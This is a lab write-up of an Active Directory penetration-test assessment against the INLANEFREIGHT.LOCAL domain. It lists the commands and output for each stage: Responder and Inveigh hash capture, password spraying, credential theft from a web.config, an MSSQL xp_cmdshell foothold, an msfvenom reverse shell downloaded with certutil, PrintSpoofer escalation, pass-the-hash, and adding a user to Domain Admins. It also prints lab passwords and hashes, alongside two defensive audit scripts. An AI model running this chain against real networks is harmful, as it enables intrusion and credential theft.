AD Enumeration & Attacks - Skills Assessment Part II

We already have SSH access to a Parrot Linux VM inside the internal network, but no domain credentials. Our objective is to compromise the Active Directory domain and obtain the krbtgt NTLM hash.

Obtain a password hash for a domain user account that can be leveraged to gain a foothold in the domain. What is the account name?

First I ran an Nmap scan in the background and started Responder to capture any NTLMv2 hashes on the wire:

nmap -T4 -A 172.16.6.0/23 -oN nmap_scan.txt &
responder -I ens24 &

While the scan was running I determined the IP address of the domain controller with 'nslookup'. I then checked for SMB null sessions and anonymous rpcclient access, without success. Next I used ldapsearch to pull information from LDAP anonymously, starting with the naming contexts:

ldapsearch -x -h 172.16.7.3 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=INLANEFREIGHT,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

I then tried to gather more information (users, computers, etc.) from the root DSE with this command:

ldapsearch -h 172.16.7.3 -x -s base -b '' "(objectClass=*)" "*" +
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: * + 
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=INLANEFREIGHT,DC=LOCAL
ldapServiceName: INLANEFREIGHT.LOCAL:dc01$@INLANEFREIGHT.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC
 =LOCAL
serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configur
 ation,DC=INLANEFREIGHT,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=INLANEFREIGHT,DC=LOCAL
namingContexts: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=INLANEFREIGHT,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=INLANEFREIGHT,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 94362
dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,
 CN=Sites,CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL
dnsHostName: DC01.INLANEFREIGHT.LOCAL
defaultNamingContext: DC=INLANEFREIGHT,DC=LOCAL
currentTime: 20240318110728.0Z
configurationNamingContext: CN=Configuration,DC=INLANEFREIGHT,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

I then searched with the filter '(objectClass=Person)' to see whether I could enumerate any valid users anonymously:

ldapsearch -h 172.16.7.3 -x -b "DC=INLANEFREIGHT,DC=LOCAL" '(objectClass=Person)'

Finally, the Nmap results came back:

Nmap scan report for inlanefreight.local (172.16.7.3)
Host is up (0.040s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-03-18 21:44:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:c9:44 (VMware)
| smb2-time: 
|   date: 2024-03-18T21:44:06
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_clock-skew: -1s

Nmap scan report for 172.16.7.50
Host is up (0.040s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-18T21:44:16+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=MS01.INLANEFREIGHT.LOCAL
| Not valid before: 2024-03-17T21:40:47
|_Not valid after:  2024-09-16T21:40:47
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: MS01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:7c:72 (VMware)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-03-18T21:44:08
|_  start_date: N/A

Nmap scan report for 172.16.7.60
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2024-03-18T17:45:52+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-03-18T17:20:37
|_Not valid after:  2054-03-18T17:20:37
| ms-sql-ntlm-info: 
|   Target_Name: INLANEFREIGHT
|   NetBIOS_Domain_Name: INLANEFREIGHT
|   NetBIOS_Computer_Name: SQL01
|   DNS_Domain_Name: INLANEFREIGHT.LOCAL
|   DNS_Computer_Name: SQL01.INLANEFREIGHT.LOCAL
|   DNS_Tree_Name: INLANEFREIGHT.LOCAL
|_  Product_Version: 10.0.17763
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SQL01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:94:ce:a5 (VMware)
| ms-sql-info: 
|   Windows server name: SQL01
|   172.16.7.60\SQLEXPRESS: 
|     Instance name: SQLEXPRESS
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|     TCP port: 1433
|_    Clustered: false
| smb2-time: 
|   date: 2024-03-18T17:45:47
|_  start_date: N/A

So we have:

  • Domain Controller (DC) with IP address: 172.16.7.3

  • MS01 host with IP address: 172.16.7.50

  • SQL01 server with IP address: 172.16.7.60

After going through the results I noticed that Responder had captured a hash for a user. Remember the Responder instance we started at the beginning? It writes captured hashes to "/usr/share/responder/logs/SMB-NTLMv2-SSP-<target IP>". All that's left is to crack this NTLMv2 hash with hashcat:

hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt

I successfully recovered the user's password.

What is this user's cleartext password?

The answer is the cleartext password recovered by cracking the NTLMv2 hash in the previous step.

Submit the contents of the C:\flag.txt file on MS01

Now that we have this user's credentials, we can use CrackMapExec to check which protocol gives us a shell on MS01:

$ crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal'
# no output: SMB gave us nothing for this user

$ crackmapexec winrm 172.16.7.50 -u 'AB920' -p 'weasal'
SMB         172.16.7.50     5985   MS01             [*] Windows 10.0 Build 17763 (name:MS01) (domain:INLANEFREIGHT.LOCAL)
HTTP        172.16.7.50     5985   MS01             [*] http://172.16.7.50:5985/wsman
WINRM       172.16.7.50     5985   MS01             [+] INLANEFREIGHT.LOCAL\AB920:weasal (Pwn3d!)

As you can see, WinRM access works on MS01, so I'll use Evil-WinRM. I prefer it over Impacket's wmiexec because it offers extra features such as upload and download.

evil-winrm -i 172.16.7.50 -u 'AB920' -p 'weasal'

and read the flag.

Use a common method to obtain weak credentials for another user. Submit the username for the user whose credentials you obtain.

I tried several techniques here without success, so I reconsidered whether the question implies a password spray. Before spraying, let's check the lockout threshold to know how many attempts we have before accounts get locked out:

*Evil-WinRM* PS C:\Users\AB920\Documents> net accounts
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              1
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        SERVER
The command completed successfully.

'Lockout threshold: Never' means no lockout is enforced, so we can spray passwords as often as we want. Let's pick a weak password and spray it across all user accounts. To get a list of domain users we can use the compromised user's credentials:

crackmapexec smb 172.16.7.50 -u 'AB920' -p 'weasal' --users
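The 'net accounts' output above is exactly what a defender should be auditing before an attacker reads it. The script below is an added example, not part of the original write-up: it parses a constructed copy of that listing and flags the settings that made spraying risk-free here (no lockout threshold, minimum length 1, no password history). The threshold constants are assumptions based on common hardening baselines, not values from the page.

```python
"""Audit a Windows 'net accounts' listing for weak account-policy settings.

Added example (not part of the original write-up). SAMPLE_NET_ACCOUNTS is a
constructed copy of the policy seen on MS01; the thresholds are assumed
baselines, not values taken from the page.
"""
import re

# Constructed sample mirroring the 'net accounts' output in the write-up.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          0
Maximum password age (days):                          42
Minimum password length:                              1
Length of password history maintained:                None
Lockout threshold:                                    Never
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        SERVER
The command completed successfully.
"""

# Assumed minimum acceptable values for the audit (hardening-baseline style).
MIN_PASSWORD_LENGTH = 12
MAX_LOCKOUT_THRESHOLD = 10
MIN_HISTORY = 24


def parse_net_accounts(text):
    """Return a dict of setting name -> raw value string."""
    settings = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        settings[key.strip()] = value.strip()
    return settings


def _as_int(value):
    """'Never' / 'None' mean the control is off: map to None, otherwise int."""
    if value.lower() in ("never", "none", "unlimited"):
        return None
    m = re.search(r"\d+", value)
    return int(m.group()) if m else None


def audit_policy(text):
    """Return a list of findings (strings) describing weak settings."""
    s = parse_net_accounts(text)
    findings = []

    threshold = _as_int(s.get("Lockout threshold", ""))
    if threshold is None:
        findings.append("lockout threshold disabled: password spraying is unthrottled")
    elif threshold > MAX_LOCKOUT_THRESHOLD:
        findings.append(f"lockout threshold {threshold} is above {MAX_LOCKOUT_THRESHOLD}")

    length = _as_int(s.get("Minimum password length", ""))
    if length is None or length < MIN_PASSWORD_LENGTH:
        findings.append(f"minimum password length {length} is below {MIN_PASSWORD_LENGTH}")

    history = _as_int(s.get("Length of password history maintained", ""))
    if history is None or history < MIN_HISTORY:
        findings.append(f"password history {history} is below {MIN_HISTORY}")

    return findings


if __name__ == "__main__":
    for finding in audit_policy(SAMPLE_NET_ACCOUNTS):
        print("[!]", finding)
```

Run it against the real output of `net accounts` (or, for the domain policy, `net accounts /domain`) and each finding maps to a Group Policy setting under Account Policies; the first one is the reason the spray below could not be stopped by lockouts.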

To build a simple wordlist I initially used the top 20 most common passwords:

123456
123456789
12345
qwerty
password
12345678
111111
123123
1234567890
1234567
qwerty123
000000
1q2w3e
aa12345678
abc123
password1
1234
qwertyuiop
123321
password123

All of these failed. I then tried a wordlist of the top 1,000 most common passwords, which I found on Wikipedia, and it worked:

kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 users_valid.txt password.txt

This gave a hit for the user "BR086".

What is this user's password?

The password was discovered in the previous step with Kerbrute.

Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?

I used the credentials of "BR086" to enumerate the shares on the network. For this task I used my favourite tool, smbmap:

smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445  Name: inlanefreight.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Department Shares                                       READ ONLY       Share for department users
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

So let's enumerate each share. To keep things simple I continue with the same tool, which is why I prefer it. I'll start with the 'NETLOGON' share:

smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R NETLOGON
[+] IP: 172.16.7.3:445  Name: inlanefreight.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        NETLOGON                                                READ ONLY
        .\NETLOGON\*
        dr--r--r--                0 Fri Apr  1 10:44:02 2022    .
        dr--r--r--                0 Fri Apr  1 10:44:02 2022    ..

Nothing special, so I move on to "Department Shares":

smbmap -u BR086 -p Welcome1 -d INLANEFREIGHT.LOCAL -H 172.16.7.3 -R "Department Shares"
[+] IP: 172.16.7.3:445  Name: inlanefreight.local
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Department Shares                                       READ ONLY
        .\Department Shares\*
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    Accounting
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    Executives
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    Finance
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    HR
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    IT
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    Marketing
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    R&D
        .\Department Shares\Accounting\*
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:17 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:54 2022    Public
        .\Department Shares\Executives\*
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:15 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:49 2022    Public
        .\Department Shares\Finance\*
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:12 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:43 2022    Public
        .\Department Shares\HR\*
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:04 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:27 2022    Public
        .\Department Shares\IT\*
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:22 2022    Public
        .\Department Shares\IT\Private\*
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    Development
        .\Department Shares\IT\Private\Development\*
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    ..
        fr--r--r--             1203 Fri Apr  1 11:05:02 2022    web.config
        .\Department Shares\Marketing\*
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:10 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:38 2022    Public
        .\Department Shares\R&D\*
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:07 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:33 2022    Public

I discovered an interesting file named 'web.config' under 'Department Shares\IT\Private\Development'. After downloading it I found credentials for a user. You can download the file with any tool you prefer; as always I used smbmap:

smbmap -u BR086 -p Welcome1 -R "Department Shares" -H 172.16.7.3 -A web.config -q
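Credentials in connection strings are exactly what the file in the IT share gave away. The script below is an added example, not code from the write-up: it parses a constructed web.config, reports every connectionString that carries a plaintext password, and shows a redaction step for reporting. The server, database, user and password values are made up; the 'SafeDb' entry shows the Integrated Security form that avoids storing a password at all.

```python
"""Find plaintext credentials in ASP.NET web.config connection strings.

Added example, not part of the original write-up. SAMPLE_WEB_CONFIG is a
constructed file shaped like the one found on the IT share; every value in
it (host, database, user, password) is made up.
"""
import re
import xml.etree.ElementTree as ET

SAMPLE_WEB_CONFIG = """<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <connectionStrings>
    <add name="ReportsDb"
         connectionString="Server=SQL01.INLANEFREIGHT.LOCAL;Database=Reports;User Id=svc_example;Password=ExamplePass123;" />
    <add name="SafeDb"
         connectionString="Server=SQL01.INLANEFREIGHT.LOCAL;Database=Audit;Integrated Security=SSPI;" />
  </connectionStrings>
</configuration>
"""

# ADO.NET accepts several spellings for the password and user keywords.
PASSWORD_KEYS = ("password", "pwd")
USER_KEYS = ("user id", "uid", "user")


def parse_connection_string(cs):
    """Split 'k=v;k=v' into a dict with lower-cased keys."""
    parts = {}
    for chunk in cs.split(";"):
        if "=" not in chunk:
            continue
        key, _, value = chunk.partition("=")
        parts[key.strip().lower()] = value.strip()
    return parts


def find_plaintext_credentials(xml_text):
    """Return [(name, user, password)] for each connection string holding a password."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    hits = []
    for add in root.iter("add"):
        cs = add.get("connectionString")
        if not cs:
            continue
        parts = parse_connection_string(cs)
        password = next((parts[k] for k in PASSWORD_KEYS if k in parts), None)
        if password is None:
            continue  # e.g. Integrated Security: nothing stored in the file
        user = next((parts[k] for k in USER_KEYS if k in parts), None)
        hits.append((add.get("name"), user, password))
    return hits


def redact(xml_text):
    """Replace password values so the file can be quoted in a report safely."""
    return re.sub(r'(?i)((?:password|pwd)\s*=\s*)[^;"]*', r"\1***", xml_text)


if __name__ == "__main__":
    for name, user, _ in find_plaintext_credentials(SAMPLE_WEB_CONFIG):
        print(f"[!] connection string '{name}' stores a password for user {user}")
    print(redact(SAMPLE_WEB_CONFIG))
```

Point it at the web.config files on a share (or a source repository) to get a list of connection strings that should be moved to Integrated Security, encrypted sections, or a secrets store; the redacted copy is what goes into the report.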

Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.

I used the obtained credentials to authenticate to MSSQL with Impacket's mssqlclient.py:

mssqlclient.py INLANEFREIGHT/netdb@172.16.7.60
Impacket v0.9.24.dev1+20211013.152215.3fe2d73a - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> enable_xp_cmdshell

Then I ran "whoami /priv" and found these juicy privileges:

SQL> xp_cmdshell "whoami /priv"
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
NULL

We know that "SeImpersonatePrivilege" can be abused with various tools. In my case I used PrintSpoofer to obtain a shell as "nt authority\system". To do this I generated a reverse TCP payload with msfvenom:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.7.240 LPORT=4444 -f exe > shell.exe

I used Meterpreter because it makes transferring files and dumping hashes straightforward. I then downloaded 'PrintSpoofer.exe' and 'shell.exe' to the target machine "SQL01" with certutil:

SQL> xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240/PrintSpoofer.exe c:\users\Public\PrintSpoofer.exe"
SQL> xp_cmdshell "certutil.exe -urlcache -f http://172.16.7.240/reverse_shell.exe  c:\users\Public\shell.exe"

I started a multi/handler listener on the Parrot attacker VM and then ran the exploit:

SQL> xp_cmdshell "c:\users\Public\PrintSpoofer.exe -c c:\users\Public\shell.exe"

and we get the shell:

[*] Started reverse TCP handler on 172.16.7.240:4444 
[*] Sending stage (200262 bytes) to 172.16.7.60
[*] Meterpreter session 1 opened (172.16.7.240:4444 -> 172.16.7.60:56938 ) at 2024-03-18 14:30:56 -0400

meterpreter > shell
Process 5580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.2628]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami  
whoami
nt authority\system

So you can read the flag.

Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.

Here I simply dumped the local hashes with Meterpreter's 'hashdump' command, which gave me the local Administrator hash:

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bdaffbfe64f1fc646a3353be1c2c3c99:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:4b4ba140ac0767077aee1958e7f78070

I then used CrackMapExec to check whether the hash could be passed to access the MS01 host:

crackmapexec winrm 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99
WINRM       172.16.7.50     5985   NONE             [*] None (name:172.16.7.50) (domain:None)
WINRM       172.16.7.50     5985   NONE             [*] http://172.16.7.50:5985/wsman
WINRM       172.16.7.50     5985   NONE             [+] None\Administrator:bdaffbfe64f1fc646a3353be1c2c3c99 (Pwn3d!)

Boom! It worked. The same local Administrator hash is valid on MS01, so let's use Evil-WinRM as always:

evil-winrm -i 172.16.7.50 -u Administrator -H bdaffbfe64f1fc646a3353be1c2c3c99

and you can read the flag.

Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?

I ran SharpHound:

.\SharpHound.exe -c ALL --zipfilename enum

Then I downloaded the archive to my Kali machine and loaded it into the BloodHound GUI, where I selected 'Find Shortest Paths to Domain Admins'.

So the answer is the user "CT059".

Crack this user's password hash and submit the cleartext password as your answer.

Here I attempted to use Mimikatz to extract credentials from memory, but it did not work. Then I recalled 'Inveigh.exe', which works similarly to Responder on Linux, so I uploaded it to MS01:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> upload Inveigh.exe
Info: Uploading Inveigh.exe to C:\Users\Administrator\Desktop\Inveigh.exe

Let's capture some NTLM hashes:

.\Inveigh.exe

Boom, we captured the NTLMv2 hash of the user "CT059", so we just need to crack it now:

*Evil-WinRM* PS C:\Users\Administrator\Desktop> .\Inveigh.exe
[*] Inveigh 2.0.4 [Started 2024-03-18T15:27:50 | PID 2856]
[+] Packet Sniffer Addresses [IP 172.16.7.50 | IPv6 fe80::190a:5243:cf28:df7a%5]
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 172.16.7.50 | IPv6 fe80::190a:5243:cf28:df7a%5]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[ ] DHCPv6
[+] DNS Packet Sniffer [Type A]
[ ] ICMPv6
[+] LLMNR Packet Sniffer [Type A]
[ ] MDNS
[ ] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[ ] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[ ] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Packet Sniffer [Port 445]
[+] File Output [C:\Users\Administrator\Desktop]
[+] Previous Session Files (Not Found)
[*] Press ESC to enter/exit interactive console
[.] [15:28:51] TCP(5985) SYN packet from 172.16.7.240:37138
[.] [15:28:51] TCP(5985) SYN packet from 172.16.7.240:37140
[.] [15:29:27] TCP(445) SYN packet from 172.16.7.3:62200
[.] [15:29:27] SMB1(445) negotiation request detected from 172.16.7.3:62200
[.] [15:29:27] SMB2+(445) negotiation request detected from 172.16.7.3:62200
[+] [15:29:27] SMB(445) NTLM challenge [F727C1E3FFDFA0B9] sent to 172.16.7.50:62200
[+] [15:29:27] SMB(445) NTLMv2 captured for [INLANEFREIGHT\CT059] from 172.16.7.3(DC01):62200:

I used hashcat to crack the NTLMv2 hash:

hashcat -m 5600 hash ./rockyou.txt

and I've got the password.

Submit the contents of the flag.txt file on the Administrator desktop on the DC01 host.

We need to add a compromised user whose credentials we have to the Domain Admins group using CT059's 'GenericAll' right. In my case I'll add the user 'AB920'. I still have a session on the SQL01.inlanefreight host; you can run these commands on MS01 as well and it will work the same way.

PS C:\Windows\system32> $SecPassword = ConvertTo-SecureString 'charlie1' -AsPlainText -Force
PS C:\Windows\system32> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\CT059', $SecPassword)

I uploaded PowerView to this host with Meterpreter's file transfer (upload) and imported it:

Import-Module .\PowerView.ps1
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'AB920' -Credential $Cred

Let's check that the user was added to the Domain Admins group:

PS C:\Users\public> Get-DomainGroupMember -Identity 'Domain Admins'
